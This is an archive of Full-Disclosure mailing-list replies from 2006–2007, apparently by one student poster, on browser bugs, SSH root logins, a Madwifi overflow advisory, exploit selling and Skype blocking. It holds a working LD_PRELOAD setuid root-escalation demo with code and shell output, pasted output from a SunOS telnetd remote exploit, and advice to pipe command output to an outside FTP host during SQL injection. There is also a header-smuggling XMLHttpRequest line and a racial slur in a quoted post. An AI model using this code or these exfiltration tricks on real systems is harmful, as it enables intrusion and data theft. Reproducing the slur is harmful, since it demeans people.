Re: [Full-disclosure] month of PHP bugs, secondary message?
On 3/4/07, Gadi Evron [EMAIL PROTECTED] wrote: - 3. Are PHP applications also a target of this initiative? No they are not. If you want a month of PHP application bugs you can subscribe to the bugtraq or full-disclosure mailinglists. snip - http://www.php-security.org/ And he didn't speak about false/insignificant holes disclosure. I gave my solution some months ago. Use mail filters file inclusion, sql injection... - forward spam. Troll detected... (^-^) -- Tyop? Student. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Firefox bookmark cross-domain surfing vulnerability
On 2/22/07, Michal Zalewski [EMAIL PROTECTED] wrote: There is an interesting vulnerability in how Firefox handles bookmarks. The flaw allows the attacker to steal credentials from commonly used browser start sites (for Firefox, Google is the seldom changed default; that means exposure of GMail authentication cookies, etc). The problem: it is relatively easy to trick a casual user into bookmarking a window that does not point to any physical location, but rather, is an inline data: URL scheme. When such a link is later retrieved, Javascript code placed therein will execute in the context of a currently visited webpage. The destination page can then continue to load without the user noticing. The impact of such a vulnerability isn't devastating, but as mentioned earlier, any attention-grabbing webpage can exploit this to silently launch attacks against Google, MSN, AOL credentials, etc. In an unlikely case the victim is browsing local files or special URLs before following a poisoned bookmark, system compromise is possible. Thanks to Piotr Szeptynski for bringing up the subject of bookmarks and inspiring me to dig into this. Self-explanatory demo page: http://lcamtuf.coredump.cx/ffbook/ This is being tracked as: https://bugzilla.mozilla.org/show_bug.cgi?id=371179 In April, just after MoPHPB, Michal Zalewski is going to plan a Month of Firefox Bugs. (^-^) -- GUASCONI Vincent Student. http://altmylife.blogspot.com [Fr]
Re: [Full-disclosure] Firefox/MSIE focus stealing vulnerability - clarification
On 2/12/07, Ruud H.G. van Tol [EMAIL PROTECTED] wrote: Michal Zalewski wrote: 2) The Firefox attack vector is related to the Charles' CVE-2006-2894, which in turn was a rediscovery of a problem known to Mozilla since 2000 (!); attempts to fix it in official releases failed because the problem was repeatedly marked as a duplicate of a too narrowly defined issue with control hiding. A broader redesign probably eliminated the issue in development branches, but it still affects Firefox 1.5 and 2.0. This can be considered an independent rediscovery and a more practical demonstration of a previously reported vulnerability. The exploit is here: http://lcamtuf.coredump.cx/focusbug/index.html Without JavaScript on, this doesn't work. See http://noscript.net/ Without a browser too, this doesn't work. See http://netcat.sourceforge.net/ -- Guasconi Vincent French Student. http://altmylife.blogspot.com [Fr]
Re: [Full-disclosure] 0day was the case that they gave me
On 2/11/07, kcope [EMAIL PROTECTED] wrote: Alla pisteua gia sena, Alla phantasomouna, Nomisa pos magapouses, Kai geliomouna. Alla pisteua gia sena, Alla phantasomouna, Nomisa pos magapouses, Kai geliomouna. http://www.com-winner.com/0day_was_the_case_that_they_gave_me.pdf http://www.com-winner.com/Alla_pisteua.mp3 http://www.com-winner.com/anothernicesong.mp3 G0 f3tch y0ur Sol10 r00tkitz :) $ uname -a SunOS 5.9 Generic*** sun4u sparc SUNW,Ultra-Enterprise $ ./ex.sh SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope [EMAIL PROTECTED] ./sunos host account ./sunos localhost bin maya ^-^ ./ex.sh localhost adm SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope [EMAIL PROTECTED] ALEX ALEX Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. SunOS 5.9 login: not working? Password: asd Login incorrect login: Password: Login incorrect login: login: ^C^C^C^C^C^C login: login: login: asd Password: ^C^C^C ^Z $ Ok. Someone have a Sol10? -- GUASCONI Vincent French Student. http://altmylife.blogspot.com [Fr]
Re: [Full-disclosure] 0day remote vuln selling SAP / Linux Kernel / PHP etc...
On 2/9/07, v3dt3n [EMAIL PROTECTED] wrote: Dear, please contact me by mail if you want this list. Thx, Rgds, Dear, Please go fcuk yourself. Dear, Please agree the Full Disclosure spirit, here it is : In european too. linux kernel ipv6 remote code execution vulnerability linux kernel ipv6 local root exploit sap remote exploit what are you searching for ? only linux bug ? interested by only exploit, or vulnerability too ? Im interested only in working exploit, with description. Only in *nix software. No restriction in applications used. Can you give me some prizes, a range, because i need them to convince my boss. more than 5000 e less than 10ke I deeply fu** the security industry. It is honourable to be accused by those who deserve to be accused. Money talks, bullshit walks. (^-^) Thx, rgds. -- GUASCONI Vincent French Student. http://altmylife.blogspot.com [Fr]
Re: [Full-disclosure] Informix SQL injection
On 2/5/07, Joshua Tagnore [EMAIL PROTECTED] wrote: List, I'm doing a pentest on a website that uses informix web datablade and found a sql injection point. I have been able to use the webexplode() stored procedure to execute any SQL commands, and also operating system commands using SYSTEM. The problem I have is that SYSTEM doesn't return the execution result (it's a procedure, not a function), so I have to save them to a file; for example : SYSTEM 'ls /etc/ /tmp/result' and then read that file... the problem is... how do I read that file ? I have tried with load from ... and it fails with a syntax error, and on the other side, when I use FILETOCLOB('/tmp/result','server') I don't know how to get the contents of the CLOB... anyone knows something informix ? Cheers, Create a file with a list of commands, and cat \your_file\ | ftp ftp.mydomain.com [port] My 2cts. -- GUASCONI Vincent Etudiant. http://altmylife.blogspot.com
Re: [Full-disclosure] Web 2.0 backdoors made easy with MSIE XMLHttpRequest
On 2/3/07, Michal Zalewski [EMAIL PROTECTED] wrote: On Sat, 3 Feb 2007, Michal Zalewski wrote: xmlhttp.open("GET\thttp://dione.ids.pl/\tHTTP/1.0\n\n", x,true); Funny enough, Paul Szabo was quick to point out that Amit Klein found the same vector that I used here for client-side backdoors in May 2006 (still not patched?! *shrieks in horror*), but for cache poisoning: IE + some popular forward proxy servers = XSS, defacement (browser cache poisoning) http://www.securityfocus.com/archive/1/434931 This is getting depressing. May 2006. but not really surprising, yes? Remember browserfun#18 (Tuesday, July 18, 2006) http://osvdb.org/27110 Metasploit, exploit in the wild like they said. Patched in October. 3 months of real insecurity. (^o^) troll Thx to Determina. http://www.determina.com/security_center/security_advisories/securityadvisory_0day_09282.asp /troll -- Tyop? [Fr] http://altmylife.blogspot.com
Re: [Full-disclosure] [Full-Disclosure] (Psexec on *NIX)
On 2/2/07, Raj Mathur [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Friday 02 February 2007 12:08, [EMAIL PROTECTED] wrote: On Fri, 02 Feb 2007 13:25:11 +0800, Eduardo Tongson said: On 2/2/07, Xavier Beaudouin [EMAIL PROTECTED] wrote: Allowing direct root login even with SSH is IMHO stupid... Please elaborate why is it IYHO stupid. In environments where more than 1 person has root access, allowing direct login to root means you can't keep an audit trail of which person logged in. And if your environment only one person has root access, that's just looking for a DoS if the one person is hit by a bus. I believe we have had this discussion before, but I'll iterate my beliefs in favour of allowing direct root access again: - - Password management is a bitch. I don't remember passwords for about half the accounts I have. Using a key-based root login, I don't need to remember those passwords either. If you take the sudo route, every user has to remember each password for each account, unless you take the deprecated route of reusing passwords (or *horrors* allow sudo without password). key-based login without passphrase is like eating cheese without bread. useless (IMHO). - - With a little bit of configuration, it's easy to figure out which key was used to login to an account; the audit trail can be managed that way. - - Managing which users have access to which root accounts is trivial this way: just add or delete their keys from .ssh/authorized_keys[2]. Totally agree. -- Tyop? http://altmylife.blogspot.com
Re: [Full-disclosure] [Full-Disclosure] (Psexec on *NIX)
On 2/2/07, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: On Fri, Feb 02, 2007 at 04:51:36PM +0100, Tyop? wrote: On 2/2/07, Raj Mathur [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Friday 02 February 2007 12:08, [EMAIL PROTECTED] wrote: On Fri, 02 Feb 2007 13:25:11 +0800, Eduardo Tongson said: On 2/2/07, Xavier Beaudouin [EMAIL PROTECTED] wrote: Allowing direct root login even with SSH is IMHO stupid... Please elaborate why is it IYHO stupid. In environments where more than 1 person has root access, allowing direct login to root means you can't keep an audit trail of which person logged in. And if your environment only one person has root access, that's just looking for a DoS if the one person is hit by a bus. I believe we have had this discussion before, but I'll iterate my beliefs in favour of allowing direct root access again: - - Password management is a bitch. I don't remember passwords for about half the accounts I have. Using a key-based root login, I don't need to remember those passwords either. If you take the sudo route, every user has to remember each password for each account, unless you take the deprecated route of reusing passwords (or *horrors* allow sudo without password). key-based login without passphrase is like eating cheese without bread. useless (IMHO). - - With a little bit of configuration, it's easy to figure out which key was used to login to an account; the audit trail can be managed that way. - - Managing which users have access to which root accounts is trivial this way: just add or delete their keys from .ssh/authorized_keys[2]. Totally agree. ... i eat cheese without bread It's dangerous. -- Tyop? http://altmylife.blogspot.com
Re: [Full-disclosure] PC/Laptop microphones
On 1/30/07, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Please stay on topic. Your trolling and bad attempts at humor do not belong on this list. We are all professionals here. Need I cite the list charter? NIGGERS On Mon, 29 Jan 2007 23:29:26 -0500 Simon Smith [EMAIL PROTECTED] wrote: Who's paranoid, I'm not paranoid, stop talking about me! On 1/29/07 11:13 PM, Jim Popovitch [EMAIL PROTECTED] wrote: On Tue, 2007-01-30 at 03:52 +0100, Tyop? wrote: On 1/30/07, Jim Popovitch [EMAIL PROTECTED] wrote: Given recent info about the US FBIs capabilities to remotely enable mobile phone microphones (presumably via corporate cellular service providers), Do you have some links on that? Paranoia inside :p ;-) Paranoia is a good characteristic to have. Here's a few references: http://www.google.com/search?hl=enq=FBI+Mob+microphone -Jim P. N3td3v go out of this body ! -- Tyop? http://altmylife.blogspot.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] PC/Laptop microphones
On 1/30/07, Jim Popovitch [EMAIL PROTECTED] wrote: Given recent info about the US FBIs capabilities to remotely enable mobile phone microphones (presumably via corporate cellular service providers), Do you have some links on that? Paranoia inside :p -- Tyop? Etudiant. http://altmylife.blogspot.com
[Full-disclosure] [Madwifi] Madwifi SIOCGIWSCAN buffer overflow // France Telecom
Name: Madwifi SIOCGIWSCAN buffer overflow
Vendor: http://www.madwifi.org
Release date: December, 7th 2006
CVE ID: CVE-2006-6332
Authors: Laurent BUTTI, Jerome RAZNIEWSKI, Julien TINNES

1. Description

There is a buffer overflow in the madwifi Atheros driver in some functions called by SIOCSIWSCAN ioctl. This issue is remotely exploitable because ioctl SIOCSIWSCAN may be called automatically by some connection managers (either directly, by using iwlib or by calling iwlist) when trying to get a list of nearby access points.

2. Details

There is a stack buffer overflow in both the giwscan_cb() and encode_ie() functions (ieee80211_wireless.c). The first issue, in giwscan_cb, is related with insufficient checks on the length in some 802.11 information elements which are controlled by the attacker:

    memcpy(buf, se->se_wpa_ie, se->se_wpa_ie[1] + 2);

The second issue is improper boundary checks in encode_ie() where ielen is never checked with bufsize.

    for (i = 0; i < ielen && bufsize > 2; i++)
        p += sprintf(p, "%02x", ie[i]);

A properly crafted 802.11 beacon or probe response frame will trigger the bug when a process tries to get scanning results by calling ioctl SIOCGIWSCAN. The information element used by the attacker can be either WPA IE, RSN IE, WMM IE or ATH IE and will lead to a kernel stack overflow.

3. Vendor status

The vendor was notified on December, 6th 2006 and issued version 0.9.2.1 to correct the issue.

4. Authors

Laurent BUTTI laurent.butti at francetelecom.com
Jerome RAZNIEWSKI jerome.razniewski at francetelecom.com
Julien TINNES julien.tinnes at francetelecom.com

-- Tyop?
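Bounds-checked counterparts of the two operations quoted in the advisory, as an added example (this is not madwifi code and not the vendor's 0.9.2.1 fix). The function names `copy_ie_checked` and `encode_ie_checked`, the `avail` parameter and the buffer sizes in `main` are assumptions made for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/*
 * Copy one 802.11 information element ([id][len][payload...]) into dst.
 * The length byte ie[1] comes from the received frame, so it is checked
 * against both the bytes actually available in the source (avail) and the
 * destination size before any copy. Returns bytes copied, 0 on rejection.
 */
size_t copy_ie_checked(uint8_t *dst, size_t dstsize,
                       const uint8_t *ie, size_t avail)
{
    size_t total;

    if (dst == NULL || ie == NULL || avail < 2)
        return 0;
    total = (size_t)ie[1] + 2;          /* at most 257 */
    if (total > avail || total > dstsize)
        return 0;
    memcpy(dst, ie, total);
    return total;
}

/*
 * Write leader followed by the IE as lowercase hex, NUL-terminated.
 * The space required is derived from ielen and compared with bufsize
 * up front, which is the check the advisory says was missing.
 * Returns characters written (without the NUL), 0 if it does not fit.
 */
size_t encode_ie_checked(char *buf, size_t bufsize,
                         const uint8_t *ie, size_t ielen,
                         const char *leader, size_t leader_len)
{
    static const char hex[] = "0123456789abcdef";
    char *p = buf;
    size_t i;

    if (buf == NULL || ie == NULL || leader == NULL)
        return 0;
    if (bufsize == 0 || leader_len >= bufsize)
        return 0;
    /* leader + 2 hex digits per byte + terminating NUL must fit */
    if (ielen > (bufsize - leader_len - 1) / 2)
        return 0;

    memcpy(p, leader, leader_len);
    p += leader_len;
    for (i = 0; i < ielen; i++) {
        *p++ = hex[ie[i] >> 4];
        *p++ = hex[ie[i] & 0x0f];
    }
    *p = '\0';
    return (size_t)(p - buf);
}

int main(void)
{
    /* Constructed sample: a vendor-specific IE claiming 255 payload bytes */
    uint8_t oversized[257] = { 0xdd, 0xff };
    uint8_t stackbuf[64];
    char text[32];

    printf("oversized IE copied: %zu bytes\n",
           copy_ie_checked(stackbuf, sizeof stackbuf,
                           oversized, sizeof oversized));
    printf("oversized IE encoded: %zu chars\n",
           encode_ie_checked(text, sizeof text, oversized,
                             sizeof oversized, "wpa_ie=", 7));
    return 0;
}
```

Both calls in `main` report 0 because the element is rejected before any byte is written.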
Re: [Full-disclosure] BIOS Flash erases all prior passwords on Acer Aspire 5102WLMi
On 12/5/06, richard cassidy [EMAIL PROTECTED] wrote: Flashing the bios on Acer Aspire 5102WLMi will erase all passwords previously set. This is obviously a bug! All passwords should not be wiped out with a bios flash (or at least they weren't on a Dell). Or, if they are, it should be stated up front so the passwords can be set again once the bios is updated. Flashing the bios will erase all data. It's a feature, not a bug. -- Tyop?
Re: [Full-disclosure] *BSD banner INT overflow vulnerability
On 11/26/06, Nick FitzGerald [EMAIL PROTECTED] wrote: [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Please maintain a reasonable standard of netiquette when posting. Thanks. Who died and made you list-nanny? Oh, that's right no-fucking-one. Your pathetic posts contribute nothing but noise to the list -- piss off... Thinking that respect of standard is pathetic (netiquette here), will result in all communications, over internet or not, -- noise. -- Tyop?
[Full-disclosure] *BSD banner INT overflow vulnerability
On 11/22/06, Sean Comeau [EMAIL PROTECTED] wrote: On Wed, Nov 22, 2006 at 12:25:46PM +0300, dead code crew wrote: %uname -sir FreeBSD 6.1-RELEASE GENERIC %gdb banner (gdb) r -w 1700 Program received signal SIGSEGV, Segmentation fault. 0x01010101 in ?? () This doesn't crash banner on OpenBSD, and even if it did who cares? What would anyone accomplish by making this setuid root? $ ls -l /usr/bin/banner -r-xr-xr-x 1 root wheel 9576 Jul 5 2005 /usr/bin/banner $ pfiuuu.. I'm safe. Thx a lot. F34r da banner H4x0r. -- Tyop?
Re: [Full-disclosure] Lack of environment sanitization in the FreeBSD, OpenBSD, NetBSD dynamic loaders.
On 11/22/06, In Cognito [EMAIL PROTECTED] wrote: Impact: Serious. May lead to privilege escalation. A class of security vulnerabilities has resurfaced in the dynamic loaders of FreeBSD, OpenBSD, and NetBSD in the sanitization of environment variables for suid and sgid binaries. Due to either badly implemented sanitization or a lack of it, a setuid binary may execute other processes with a tainted environment. [...] Have fun! Stay safe!

Fun. Not perfectly safe. My experience :

    %id
    uid=0(root) gid=0(wheel) groups=0(wheel), 5(operator)
    %cat vuln.c
    main() { setuid(0); execl("/usr/bin/id","id",0); }
    %cc vuln.c -o vuln
    chmod 4711 ./vuln
    %exit
    id
    uid=1001(tyop) gid=1001(tyop) groups=1001(tyop)
    ls -l vuln
    -rws--x--x 1 root tyop 4827 Nov 22 22:46 vuln
    cat tyop.c
    __attribute__ ((constructor)) main() { printf("[+] Hello from shared library land\n"); execle("/bin/sh","sh",0,0); }
    cc -shared -o lib.so tyop.c
    setenv LD_PRELOAD /home/tyop/test/lib.so
    ./vuln
    [+] Hello from shared library land
    # id
    uid=0(root) gid=0(wheel) egid=1001(tyop) groups=1001(tyop)
    # echo It works on `uname -sr`
    It works on FreeBSD 7.0-CURRENT-200609
    #

Have a nice day. -- Tyop?
Re: [Full-disclosure] Lack of environment sanitization in the FreeBSD, OpenBSD, NetBSD dynamic loaders.
On 11/22/06, Tyop? [EMAIL PROTECTED] wrote: On 11/22/06, In Cognito [EMAIL PROTECTED] wrote: Impact: Serious. May lead to privilege escalation. A class of security vulnerabilities has resurfaced in the dynamic loaders of FreeBSD, OpenBSD, and NetBSD in the sanitization of environment variables for suid and sgid binaries. Due to either badly implemented sanitization or a lack of it, a setuid binary may execute other processes with a tainted environment. [...] Have fun! Stay safe!

Fun. Not perfectly safe. My experience :

    %id
    uid=0(root) gid=0(wheel) groups=0(wheel), 5(operator)
    %cat vuln.c
    main() { setuid(0); execl("/usr/bin/id","id",0); }
    %cc vuln.c -o vuln
    chmod 4711 ./vuln
    %exit
    id
    uid=1001(tyop) gid=1001(tyop) groups=1001(tyop)
    ls -l vuln
    -rws--x--x 1 root tyop 4827 Nov 22 22:46 vuln
    cat tyop.c
    __attribute__ ((constructor)) main() { printf("[+] Hello from shared library land\n"); execle("/bin/sh","sh",0,0); }
    cc -shared -o lib.so tyop.c
    setenv LD_PRELOAD /home/tyop/test/lib.so
    ./vuln
    [+] Hello from shared library land
    # id
    uid=0(root) gid=0(wheel) egid=1001(tyop) groups=1001(tyop)
    # echo It works on `uname -sr`
    It works on FreeBSD 7.0-CURRENT-200609
    #

Have a nice day.

    # echo It works with vuln static too
    It works with vuln static too.

(sry for double post) -- Tyop?
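For the case shown in the two posts above (a setuid program that becomes root and then executes a child with the caller's environment intact), an added example of the application-side mitigation: build the child's environment from an allow-list instead of inheriting it. This is not code from the thread or from any BSD loader; `build_clean_env`, the allow-list and the fixed PATH are assumptions, and it does not help where the loader itself honours LD_PRELOAD for the setuid binary.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

extern char **environ;

/* Variables the privileged child may inherit (assumed list for this example). */
static const char *const ENV_ALLOW[] = { "TERM", "LANG", NULL };

/*
 * Return 1 if entry is "NAME=value", NAME is on the allow-list, and the
 * value contains neither '/' nor '%' (no paths, no format directives).
 */
static int env_entry_allowed(const char *entry)
{
    const char *eq = strchr(entry, '=');
    size_t i, nlen;

    if (eq == NULL || eq == entry)
        return 0;
    nlen = (size_t)(eq - entry);
    for (i = 0; ENV_ALLOW[i] != NULL; i++) {
        if (strlen(ENV_ALLOW[i]) == nlen &&
            strncmp(entry, ENV_ALLOW[i], nlen) == 0)
            return strpbrk(eq + 1, "/%") == NULL;
    }
    return 0;
}

/*
 * Fill out[] with a fixed PATH plus the allow-listed entries of envp,
 * NULL-terminated. Everything else (LD_PRELOAD, LD_LIBRARY_PATH, the
 * caller's PATH, ...) is dropped because it is never copied.
 * Returns the number of entries stored, not counting the NULL.
 */
size_t build_clean_env(char *const envp[], const char *out[], size_t outcap)
{
    size_t n = 0, i;

    if (outcap < 2) {
        if (outcap == 1)
            out[0] = NULL;
        return 0;
    }
    out[n++] = "PATH=/bin:/usr/bin";
    for (i = 0; envp != NULL && envp[i] != NULL && n + 1 < outcap; i++) {
        if (env_entry_allowed(envp[i]))
            out[n++] = envp[i];
    }
    out[n] = NULL;
    return n;
}

int main(void)
{
    const char *clean[8];
    char *const argv[] = { "id", NULL };

    /* Same child as vuln.c in the post, but with a rebuilt environment. */
    build_clean_env(environ, clean, sizeof clean / sizeof clean[0]);
    execve("/usr/bin/id", argv, (char *const *)clean);
    perror("execve");
    return 1;
}
```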
Re: [Full-disclosure] Microsoft Firefox?
On 11/7/06, Zachary Miller [EMAIL PROTECTED] wrote: On Nov 6, 2006, at 1:34 PM, imipak wrote: Simon Smith wrote: http://www.msfirefox.com/microsoft-firefox/index.html Probably some joker playing mind games.; still -- snip Google search for site:msfirefox.com and look at the cached version. MS Firefox 2007 delivers a dramatic boost in the download speeds of online pornography. By utilising a proprietary dynamic algorithm - anything that remotely resembles a tit or a boob will download up to 10 times faster. Fun at the speed of light! Doubting it's Microsoft, unless they're planning a radical change in company philosophy. Still funny, though. Microsoft Firefox 2007 will run on most Operating Systems (by Microsoft). System Requirements : Computer/Processor Quadcore CPU 4.6GHz processor or higher (For the loading of Hotmail.com) Microsot Powerpoint 2007 (For exceptional Spyware Protection) I *think* it isn't a Microsoft web site... -- Tyop?
Re: [Full-disclosure] Firefox 1.5.0.7 Exploit
On 11/2/06, Bram Dumolin [EMAIL PROTECTED] wrote: re, On 2 Nov 2006 16:43:35 -, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: Do 2 Nov 16:35:53 CET 2006 Vulnerable: Firefox 1.5.0.7 and probably versions below Impact: DoS (perhaps Code Execution) As Firefox 2.0 was released a few days ago... A new Exploit for the old version! The great Firefox! ;D On Kubuntu Linux the exploits does not just kill firefox but freezes the whole system! Probably it will also freeze other distros! If the URL is bigger than 4092 bytes, Firefox crashes! The URL in the following code is 4093 bytes! No problem on Mac OS X 10.4.8 with firefox 1.5.0.7. firefox 1.5.0.7 on FreeBSD 7.0(september) and on Linux debian 2.6.17-2-686, Not affected. -- Tyop?
Re: [Full-disclosure] [ Capture Skype trafic ]
On 10/29/06, Brian Eaton [EMAIL PROTECTED] wrote: On 10/28/06, gabriel rosenkoetter [EMAIL PROTECTED] wrote: On Sat, Oct 28, 2006 at 11:24:40AM +0200, Cedric Blancher wrote: Have you ever heard of Skype API that basically allows two applications to communicate on top of Skype network, thus inheriting Skype resilience, encryption, obfuscation and firewall punching capabilities ? I don't see how this isn't still an HR problem. It is an HR problem. It's also an IT problem. Neither group can solve the issue without help from the other. And both groups need buy-in from the rest of the organization if they expect to make the solution stick. Good troll. I think that filtering a program like this, HR or IT, will prevent a lot of problems, because of his closing-encrypted-nonRE source. I find this closed politic-protocol-program too dangerous to let it run in my network. I need to match it on a gate, and I haven't found any useful information. Thx to the list for the discussion. -- Tyop? And excuse my english.
[Full-disclosure] [ Capture Skype trafic ]
All is in the mail's subject. I need to match this crazy-encrypted-random traffic, to destroy it (I think I'm not alone to need information on this product). I've found some work on the BlackHats slides, but skype updates.. Thx in advance. -- Tyop? Student. Excuse my english.
Re: [Full-disclosure] [ Capture Skype trafic ]
On 10/27/06, Exibar [EMAIL PROTECTED] wrote: From: Tyop? [EMAIL PROTECTED] All is in the mail's subject. I need to match this crazy-encrypted-random traffic, to destroy it (I think I'm not alone to need information on this product). I've found some work on the BlackHats slides, but skype updates.. use a packet analyzer proxy bluecoat comes to mind as one that works quite well... http://www.bluecoat.com/downloads/whitepapers/BCS_controlling_skype_wp.pdf Bluecoat doesn't match the packets, sorry. quote: It is also recommended that enterprises block downloads of URLs ending with skype.exe. This will prevent new Skype software from being downloaded to enterprise machines. This is very funny. ^-^ -- Tyop? Please excuse my english.
Re: [Full-disclosure] Flaw in Firefox 2.0 RC2
On 10/20/06, Jure Pečar [EMAIL PROTECTED] wrote: On Thu, 19 Oct 2006 13:05:48 -0400 Mark A Basil [EMAIL PROTECTED] wrote: On Wed, 2006-10-18 at 10:28 +1000, jm wrote: Firefox 1.5.07 on CentOS died quite nicely too. [EMAIL PROTECTED] wrote: http://lcamtuf.coredump.cx/ffoxdie.html this exploit still works with the latest Firefox 2.0 RC3 It is also affecting any browser using the Gecko rendering engine (gecko-1.8 at least), such as Epiphany and Galeon, and not restricted to 'Firefox'. Also renders Opera 9.02 (build 434) on linux unresponsive at 100% cpu usage. Netcat 0.7.1 isn't affected on FreeBSD 7.0. -- Tyop?
Re: [Full-disclosure] Security Rss Feeds
http://portal.spidynamics.com/blogs/msutton/rss.aspx
http://ha.ckers.org/blog/feed/
http://sunbeltblog.blogspot.com/
http://www.schneier.com/blog/
http://blogs.technet.com/antimalware/default.aspx
http://www.f-secure.com/weblog/
http://taosecurity.blogspot.com/
http://www.avertlabs.com/research/blog
http://blogs.technet.com/markrussinovich/default.aspx
http://blogs.technet.com/msrc/default.aspx
http://technobabylon.typepad.com/tb/
http://isc.sans.org/
http://www.securityfocus.com/

I add one more

News/
http://blogs.securiteam.com/index.php/feed/

Last Exploits on the wild/
http://www.metasploit.org/projects/Framework/updates/rss.html
http://www.milw0rm.com/rss.php

-- Tyop?
[Full-disclosure] 0day IE6? ActiveX COM
Does someone have more information about a 0day on ActiveX? Here are my links: http://www.milw0rm.com/exploits/2358 http://blogs.securiteam.com/index.php/archives/600 http://www.xsec.org/ -- Tyop?